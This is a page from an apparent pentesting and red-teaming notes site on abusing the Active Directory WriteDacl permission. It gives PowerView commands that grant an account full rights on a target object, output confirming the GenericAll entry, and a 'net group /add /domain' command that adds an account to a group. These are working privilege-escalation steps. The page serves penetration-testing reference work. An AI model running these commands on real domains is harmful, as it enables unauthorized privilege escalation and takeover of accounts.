🧙
Pentesting & Red Teaming Notes
  • Windows
    • Recon - Initial Access
    • Privilege Escalation
      • Enable Privs
      • SeBackupPrivilege
      • SeImpersonatePrivilege
      • SeDebugPrivilege
    • Kerberoasting
    • Lateral Movement
    • MSSQL
    • AD Related
    • Bypass-Evasion Techniques
    • Post Exploitation
    • Miscellaneous
    • UAC Bypass
    • Exploits
      • MS03-026 - RPC DCOM
      • MS04-011 - LSASRV
      • MS08-67 - Netapi
      • MS17-010 - Eternalblue
      • CVE-2019-1388
      • CVE-2020-1472 - Zerologon
      • CVE-2020-16938
      • CVE-2021-1675 - PrintNightmare
      • CVE-2022-21999 - SpoolFool
    • Coerced Auth
  • Linux
  • Abusing Active Directory ACLs
    • ReadLAPSPassword
    • WriteDacl
    • GenericWrite
    • ForceChangePassword
    • WriteOwner
  • Port Forwarding - Tunneling
  • Cloud
  • Mobile
  • Malware Development
    • Process Migration
    • Process Hollowing
    • Dynamic API Resolution
    • Suspended Threads
    • PPID Spoofing
    • Thread Stack Spoofing
    • ETW (Event Tracing for Windows)
    • AMSI Bypass
    • Tools
    • Esoteric
Powered by GitBook
On this page
  1. Abusing Active Directory ACLs

WriteDacl

You can add new ACLs

PS C:\\Users> Add-DomainObjectAcl  -PrincipalIdentity "morph3" -TargetIdentity "TARGETOBJECT" -Rights All
Add-DomainObjectAcl  -PrincipalIdentity "morph3" -TargetIdentity "TARGETOBJECT" -Rights All

PS C:\\Users> Get-ObjectAcl -Identity "TARGETOBJECT" -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\\$env:Username")) {$_}}
Get-ObjectAcl -Identity "TARGETOBJECT" -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\\$env:Username")) {$_}}

...

AceType               : AccessAllowed
ObjectDN              : <target-objcet>
ActiveDirectoryRights : GenericAll
OpaqueLength          : 0
...
AceFlags              : None
AceQualifier          : AccessAllowed
Identity              : ECORP\\morph3

^ we added the ACL

PS C:\\Users> net group "morph3" TARGETOBJECT /add /domain
net group "morph3" TARGETOBJECT /add /domain
The request will be processed at a domain controller for domain ECORP.LOCAL.

The command completed successfully.

PreviousReadLAPSPasswordNextGenericWrite

Last updated 2 years ago